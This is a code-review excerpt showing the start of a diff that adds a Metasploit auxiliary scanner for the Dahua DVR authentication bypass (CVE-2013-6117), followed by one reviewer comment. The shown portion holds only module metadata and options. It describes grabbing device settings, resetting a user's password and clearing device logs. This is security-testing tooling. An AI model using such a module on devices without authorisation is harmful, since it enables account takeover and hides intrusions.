modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb

```diff
@@ -0,0 +1,304 @@
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name'            => %q(Dahua DVR Auth Bypass Scanner),
+      'Description'     => %q(Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user's password and clears the device logs),
+      'Author'          => [
+        'Jake Reynolds - Depth Security', # Vulnerability Discoverer
+        'Tyler Bennett - Talos Infosec' # Metasploit Module
+      ],
+      'References'      => [
+        [ 'CVE', '2013-6117' ],
+        [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ]
+      ],
+      'License'         => MSF_LICENSE
+       )
+    deregister_options('RHOST')
+    register_options([
+      OptString.new('USERNAME', [false, 'A username to reset', '888888']),
+      OptString.new('PASSWORD', [false, 'A password to reset the user with']),
```

Comment:
I figure this is needed as well as a printout of the randomly assigned password.